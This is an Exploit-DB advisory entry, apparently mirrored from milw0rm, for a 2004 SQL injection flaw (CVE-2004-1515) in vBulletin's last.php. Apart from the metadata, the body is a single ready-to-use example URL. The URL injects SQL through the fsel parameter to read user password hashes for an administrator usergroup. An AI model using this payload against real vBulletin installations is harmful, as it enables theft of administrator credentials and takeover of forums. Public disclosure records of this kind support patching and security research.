vBulletin LAST.PHP SQL Injection Vulnerability

2004-11-15T00:00:00
ID EDB-ID:631
Type exploitdb
Reporter N/A
Modified 2004-11-15T00:00:00

Description

vBulletin LAST.PHP SQL Injection Vulnerability. CVE-2004-1515. Webapps exploit for php platform

                                        
                                            Example:

http://www.example.com/last.php?fsel=,user.password%20as%20title,user.%20%20%20%20username%20as%20lastposter%20FROM%20user,thread%20%20%20%20%20WHERE%20usergroupid=6%20LIMIT%201

# milw0rm.com [2004-11-15]